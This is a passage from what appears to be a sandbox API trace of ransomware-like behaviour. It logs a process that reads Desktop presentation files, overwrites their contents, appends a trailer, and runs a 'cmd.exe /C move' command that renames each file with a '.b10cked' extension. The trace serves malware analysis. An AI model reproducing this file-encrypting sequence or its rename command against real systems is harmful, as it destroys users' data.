(hObject=0x1b4) returned 1 [0228.615] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.615] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.615] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0228.615] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.615] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.615] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0228.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.615] ReleaseMutex (hMutex=0xf8) returned 1 [0228.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.615] ReleaseMutex (hMutex=0xf8) returned 1 [0228.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.615] ReleaseMutex (hMutex=0xf8) returned 1 [0228.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.615] ReleaseMutex (hMutex=0xf8) returned 1 [0228.615] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.615] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.615] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.615] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.615] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28540461559) returned 1 [0228.615] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.615] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x136b2 [0228.617] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13b9a [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13b9a [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.619] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.619] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9dcc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9dcc, lpOverlapped=0x0) returned 1 [0228.619] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.619] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x9dcc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x9dcc, lpOverlapped=0x0) returned 1 [0228.619] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-40396, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9dce [0228.619] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9dcc, lpNumberOfBytesRead=0x12ec08, 
lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9dcc, lpOverlapped=0x0) returned 1 [0228.620] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-40396, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9dce [0228.620] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x9dcc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x9dcc, lpOverlapped=0x0) returned 1 [0228.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SXGpQHv i4OFxmN5_1.odp", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0228.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SXGpQHv i4OFxmN5_1.odp", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SXGpQHv i4OFxmN5_1.odp", lpUsedDefaultChar=0x0) returned 22 [0228.625] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13b9a [0228.625] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.625] CloseHandle (hObject=0x1b4) returned 1 [0228.626] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP") returned 0x25 [0228.626] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0228.627] CreateProcessW (in: lpApplicationName=0x0, 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x910, dwThreadId=0x234)) returned 1 [0228.632] CloseHandle (hObject=0x120) returned 1 [0228.632] CloseHandle (hObject=0x1b4) returned 1 [0228.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.632] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0228.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.632] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 
2 [0228.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.632] ReleaseMutex (hMutex=0xf8) returned 1 [0228.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.632] ReleaseMutex (hMutex=0xf8) returned 1 [0228.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.632] ReleaseMutex (hMutex=0xf8) returned 1 [0228.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.632] ReleaseMutex (hMutex=0xf8) returned 1 [0228.633] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28542211715) returned 1 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x11556 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1106e [0228.635] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x11556 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x11556 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.636] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8aaa, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8aaa, lpOverlapped=0x0) returned 1 [0228.637] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.637] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x8aaa, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x8aaa, lpOverlapped=0x0) returned 1 [0228.637] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-35498, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8aac [0228.637] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8aaa, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8aaa, lpOverlapped=0x0) returned 1 [0228.637] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-35498, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8aac [0228.637] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, 